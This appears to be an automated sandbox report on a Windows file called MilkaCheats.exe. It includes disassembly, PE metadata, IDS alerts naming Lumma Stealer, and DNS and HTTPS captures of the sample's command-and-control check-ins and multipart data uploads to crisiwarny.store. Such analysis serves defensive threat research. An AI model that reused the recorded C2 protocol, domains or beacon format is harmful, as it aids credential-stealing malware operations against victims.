                                                                                            je 00007F890CFB47C2h
                                                                                            xor eax, eax
                                                                                            mov ecx, edx
                                                                                            lock cmpxchg dword ptr [esi], ecx
                                                                                            test eax, eax
                                                                                            jne 00007F890CFB47A2h
                                                                                            xor al, al
                                                                                            pop esi
                                                                                            ret
                                                                                            mov al, 01h
                                                                                            pop esi
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            cmp dword ptr [ebp+08h], 00000000h
                                                                                            jne 00007F890CFB47B9h
                                                                                            mov byte ptr [00482A6Ch], 00000001h
                                                                                            call 00007F890CFB49ACh
                                                                                            call 00007F890CFB7899h
                                                                                            test al, al
                                                                                            jne 00007F890CFB47B6h
                                                                                            xor al, al
                                                                                            pop ebp
                                                                                            ret
                                                                                            call 00007F890CFC0F58h
                                                                                            test al, al
                                                                                            jne 00007F890CFB47BCh
                                                                                            push 00000000h
                                                                                            call 00007F890CFB78A0h
                                                                                            pop ecx
                                                                                            jmp 00007F890CFB479Bh
                                                                                            mov al, 01h
                                                                                            pop ebp
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            cmp byte ptr [00482A6Dh], 00000000h
                                                                                            je 00007F890CFB47B6h
                                                                                            mov al, 01h

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2dbcc          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x84000          0x595         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x85000          0x1bdc        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x2beb8          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2bdf8          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x24000          0x148         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type           Entropy             Characteristics
.text   0x1000           0x22f2e       0x23000   4da3a75dbd74dc877bf127c55bdda469  False     0.5811732700892858  data                6.646705992844183   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x24000          0xa328        0xa400    8936a0b6950510a54f01ca3041031b55  False     0.4328791920731707  OpenPGP Public Key  4.945790274654163   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x2f000          0x54578       0x53600   fa6c5f641266ff2bb8199c02b0ca89fa  False     0.9909225074962519  OpenPGP Public Key  7.992273569021661   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x84000          0x595         0x600     4d5387608e55814216b03d2ac9e670b3  False     0.4420572916666667  data                3.9845156370208854  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x85000          0x1bdc        0x1c00    5d2927ae47e9e21cdc2a94ae35d94f02  False     0.7544642857142857  data                6.513957656076399   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA      Size   Type                                                      Language  Country        ZLIB Complexity
RT_VERSION   0x840a0  0x378  data                                                      English   United States  0.46283783783783783
RT_MANIFEST  0x84418  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5931758530183727

DLL           Import
USER32.dll    wsprintfA
KERNEL32.dll  TerminateProcess, WriteConsoleW, GetStdHandle, DeleteFileA, HeapAlloc, HeapFree, GetProcessHeap, GlobalFindAtomW, WriteConsoleA, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, SetEndOfFile, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, WriteFile, GetModuleFileNameW, ExitProcess, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, CreateFileW

Language of compilation system  Country where language is spoken  Map
English                         United States

Timestamp                        SID      Signature                                                                       Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2024-10-27T16:44:59.376608+0100  2049836  ET MALWARE Lumma Stealer Related Activity                                       1         192.168.2.4  49730        172.67.170.64  443        TCP
2024-10-27T16:44:59.376608+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                       1         192.168.2.4  49730        172.67.170.64  443        TCP
2024-10-27T16:45:01.669879+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2                                    1         192.168.2.4  49732        172.67.170.64  443        TCP
2024-10-27T16:45:01.669879+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                       1         192.168.2.4  49732        172.67.170.64  443        TCP
2024-10-27T16:45:09.623341+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                           1         192.168.2.4  49741        172.67.170.64  443        TCP
2024-10-27T16:45:10.787252+0100  2843864  ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2  1         192.168.2.4  49743        172.67.170.64  443        TCP
2024-10-27T16:45:15.310166+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                       1         192.168.2.4  49748        172.67.170.64  443        TCP

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                            Oct 27, 2024 16:45:09.084922075 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:09.084935904 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.623411894 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.623642921 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.623681068 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:09.623745918 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.104568958 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.104650021 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.104788065 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.105113029 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.105148077 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.734853983 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.734956026 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.763633013 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.763689995 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.764102936 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.785723925 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786556005 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786645889 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.786739111 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786798954 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.786943913 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786998987 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787116051 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787199974 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787412882 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787477016 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787678003 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787729025 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787746906 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787775993 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787873030 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787915945 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787961960 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.788053036 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.788105965 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.798275948 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.798487902 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.798579931 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.798597097 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.798650026 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.798737049 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.803807974 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.153851032 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.154079914 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.154117107 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.154182911 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181072950 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181140900 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.181287050 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181586027 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181617975 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.799938917 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.800046921 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.801332951 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.801362038 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.801708937 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.802979946 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.803020000 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.803078890 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310168028 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310380936 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310472965 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:15.310549021 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:15.310594082 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310622931 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:15.310637951 CET44349748172.67.170.64192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 16:44:57.889862061 CET | 49974 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 16:44:57.901324987 CET | 53 | 49974 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 16:44:57.904257059 CET | 61665 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 16:44:57.914037943 CET | 53 | 61665 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 16:44:57.952079058 CET | 55682 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 16:44:57.967638969 CET | 53 | 55682 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 16:44:57.889862061 CET | 192.168.2.4 | 1.1.1.1 | 0x4bff | Standard query (0) | messejawu.store | A (IP address) | IN (0x0001) | false
Oct 27, 2024 16:44:57.904257059 CET | 192.168.2.4 | 1.1.1.1 | 0xf44f | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 27, 2024 16:44:57.952079058 CET | 192.168.2.4 | 1.1.1.1 | 0xcec6 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 16:44:57.901324987 CET | 1.1.1.1 | 192.168.2.4 | 0x4bff | Name error (3) | messejawu.store | none | none | A (IP address) | IN (0x0001) | false
Oct 27, 2024 16:44:57.914037943 CET | 1.1.1.1 | 192.168.2.4 | 0xf44f | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 27, 2024 16:44:57.967638969 CET | 1.1.1.1 | 192.168.2.4 | 0xcec6 | No error (0) | crisiwarny.store |  | 172.67.170.64 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 16:44:57.967638969 CET | 1.1.1.1 | 192.168.2.4 | 0xcec6 | No error (0) | crisiwarny.store |  | 104.21.95.91 | A (IP address) | IN (0x0001) | false
                                                                                            • crisiwarny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-27 15:44:58 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: crisiwarny.store
2024-10-27 15:44:58 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-27 15:44:59 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:44:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=l7m9ojf4da84pd9idm6gmh38ni; expires=Thu, 20 Feb 2025 09:31:38 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjkak7vpO5A8wdnT3gQ7Ov94k%2Fa%2FpztG6Uzq%2FatXNFu6M3EOJFCxyCciFKLjpjENmVdwrTF07f5OrFd0Ojghe5tT%2FrZzhAmms%2FpYEqhmrV9lk4iPCNTdQKK8sCgPClB%2B0huQ"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf806f56478b-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1615&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1783251&cwnd=251&unsent_bytes=0&cid=cad30245dbcea1fe&ts=774&x=0"
2024-10-27 15:44:59 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-27 15:44:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-27 15:45:00 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 52
                                                                                            Host: crisiwarny.store
2024-10-27 15:45:00 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 35 37 34 33 34 30 36 32 35 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--5574340625&j=
2024-10-27 15:45:01 UTC | 1012 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=r0hkrrnvkjit9ajn33pnuh6ogu; expires=Thu, 20 Feb 2025 09:31:40 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtPSKhWP4ZNkHN3kBx7Jt3pVLAAvFj%2B2Q6IicEGeEt%2FGwfm1LFAyOpCz3QkF2rdbY11Cv5378yepWZYky3E%2BrIT7r%2BLlrvbvvUn7phMgfEEzo2J86K5n%2FOKZmg2xcl6yuney"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf89dd8ce946-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1277&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=2195602&cwnd=251&unsent_bytes=0&cid=9ea3799169a70fe4&ts=1296&x=0"
                                                                                            Data Ascii: cgcCS9ajgE7t1NqD7s4V7rxcj5jk2mUkSxxkwAVGAHlmEVXelPRVVyvFDNL5W9KuudyfyDZKdzSPmOUZnttVLfKBBc/Q9BiKphqVQyoIVb9qSN4bYs0mokRIJsYegQaqItKRx1PkUIbr0UmPqUoWeyvJTds5Q37kWYg1RgdGBTwzwNHcBzNF0nqAztLtGFBuqlyYHGFe8iRcCCUW1dYXLPdEUAWcrhCG7hCexSnDlvrtQwGNsg11NY+cZMWBUUa
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 49 72 58 4a 68 79 49 70 52 47 62 41 6d 6f 62 58 54 39 73 6a 34 47 48 66 77 71 33 63 46 71 52 74 42 4f 52 67 6f 55 38 4e 4e 53 58 32 68 68 6a 55 73 4d 75 68 5a 48 48 71 59 6a 47 4f 58 78 4b 33 67 31 69 32 4f 4a 6e 32 68 79 6b 77 41 46 44 56 6d 69 32 52 51 45 50 6b 2f 59 63 69 4b 55 52 6d 77 4a 71 47 31 70 39 37 73 6b 4c 53 44 62 50 4f 54 76 42 58 4c 55 53 45 59 49 66 34 71 4a 49 78 45 72 54 4a 46 4c 58 50 63 55 63 31 6e 7a 62 33 58 6f 75 43 49 37 59 65 34 42 6d 4f 41 2b 59 39 4e 57 51 67 70 46 2f 74 4a 53 45 57 67 55 7a 41 4a 63 71 78 51 7a 57 65 77 68 56 66 75 38 50 44 73 78 32 54 33 5a 78 79 73 6e 37 57 5a 71 51 56 75 67 78 67 4d 4b 4c 46 71 68 63 6a 75 2f 55 57 77 6e 6c 52 68 4a 2f 61 39 77 48 69 44 64 4f 4a 71 66 61 48 69 54 41 41 56 74 58 4c 58 4d 55
                                                                                            Data Ascii: IrXJhyIpRGbAmobXT9sj4GHfwq3cFqRtBORgoU8NNSX2hhjUsMuhZHHqYjGOXxK3g1i2OJn2hykwAFDVmi2RQEPk/YciKURmwJqG1p97skLSDbPOTvBXLUSEYIf4qJIxErTJFLXPcUc1nzb3XouCI7Ye4BmOA+Y9NWQgpF/tJSEWgUzAJcqxQzWewhVfu8PDsx2T3Zxysn7WZqQVugxgMKLFqhcju/UWwnlRhJ/a9wHiDdOJqfaHiTAAVtXLXMU


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            2 | 192.168.2.4 | 49736 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-10-27 15:45:02 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18168
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:02 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:03 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=prl49i7846bu8g5ql22ahpsot9; expires=Thu, 20 Feb 2025 09:31:41 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CsZiINoUXwc6wjOVCB%2B3nnI0qmoa4cgjZSCkBy59%2FikOKpBkK4L0Y%2F0BrwsIET2J6frSe%2BYcwnASZwtait5yzsC9h%2B987FumQpMD30kDJKNM00EPT7sFjfy8iS2U86wjxKXA"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf97286ee96a-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2375&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19130&delivery_rate=1289977&cwnd=250&unsent_bytes=0&cid=41561136401a2d35&ts=697&x=0"
                                                                                            2024-10-27 15:45:03 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            3 | 192.168.2.4 | 49738 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-10-27 15:45:03 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8789
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:03 UTC | 8789 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:05 UTC | 1008 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=s6l77sqnnnj78oqbp6gj1ljnm9; expires=Thu, 20 Feb 2025 09:31:44 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
